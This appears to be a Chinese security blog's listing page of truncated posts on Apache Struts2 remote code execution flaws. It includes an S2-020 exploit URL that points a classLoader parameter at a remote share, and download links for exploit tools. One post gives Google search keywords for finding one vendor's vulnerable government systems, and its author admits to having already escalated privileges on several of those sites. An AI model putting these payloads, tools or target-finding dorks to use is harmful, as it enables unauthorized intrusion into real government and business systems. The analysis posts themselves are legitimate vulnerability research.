渗透测试

0
之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!  暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat利用方式: http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test 绕过方式是: http://localhost:8080/Str......

代码审计 渗透测试

5
之前winwin已经发过这个漏洞的分析文章,分析的很到位,不过有几个点有些问题,所以我在这里把自己的分析内容发出来,供各位参考。       这个漏洞的数据污染点和触发点,和其他的Struts不一样,所以本篇分析将从Struts执行流程中剖析此漏洞。在Struts2.3以后,官方将原有的起始过滤器换为:org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.class  ......

实用工具 渗透测试

0
K8_Struts2_EXP_0718[K8] struts2最新s2-016代码执行漏洞exp利用工具下载 K8_Struts2_EXP_0718[K8]   下载地址: http://pan.baidu.com/share/link?shareid=2765322418&uk=4045637737    

实用工具

2
这是一个代码执行漏洞,利用java代码来执行系统命令。    影响版本:Struts 2.0.0 – Struts 2.3.15   漏洞说明: The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. Thi......

渗透测试

0
注: 利用工具可以用任意语言编写其实就是发送漏洞代码就行了。一个request一个response,我尝试用过纯JS PHP JSP JavaSwing JavaFX 现在android版本都快写好了。本来打算发视频和利用工具的不过还是算了吧,懂的人自然就懂了. 演示DEMO下载: http://pan.baidu.com/share/link?shareid=495946&uk=1076602916 利用代码: 检测是否存在:   POC1: http://127.0.0......

实用工具

0
by 空虚浪子心 http://www.inbreak.net 微博:http://t.qq.com/javasecurity 摘要 Apache官方的struts2产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是0DAY,官方没有修补方案出现。 http://struts.apache.org/development/2.x/docs/security-bulletins.html — (公告) 官方安全公告给出了编号和简要介绍,“A vulnerability, present in the includeParams attribute of the URL and A......

渗透测试

某政府政务管理系统通用Struts2漏洞

发表于5年前 | 作者: seay

0
作者:疯子 博客:http://Madman.in 呵呵,没事组合点struts2的关键字玩。 玩到一个通用的 而且百分之90是政府 的。 小菜已经提权了几个 我也放出来吧,希望厂商修复,不要让政府的网站被利用。 谷歌关键字:inurl:common/common_info.action?wid= 全部是一个厂商的 厂商名称:深圳太极软件有限公司 提权不会的自己百度 Seay加上一点关键字 Inurl:index.action Inurl:商城.achtion Inurl:index.achtio......

渗透测试

Struts2漏洞解析和利用方法

发表于5年前 | 作者: seay

0
  最近Struts2漏洞很火,几年前的漏洞随着工具的出现变得异常火爆!Struts2是什么有多少人知道呢? Struts2是JavaEE的一个MVC框架,不过我更喜欢SpringMVC。为什么会有那么多人选择Struts2?因为Struts2开发效率高,封装得非常完善。缺点就是太大太臃肿,ActionContext和OGNL太那啥了。没错OGNL注入也就是漏洞源。 没错,哥就是来科普的。文章是去年写的,Struts2漏洞并不止一个的,看DEMO。 Struts2第......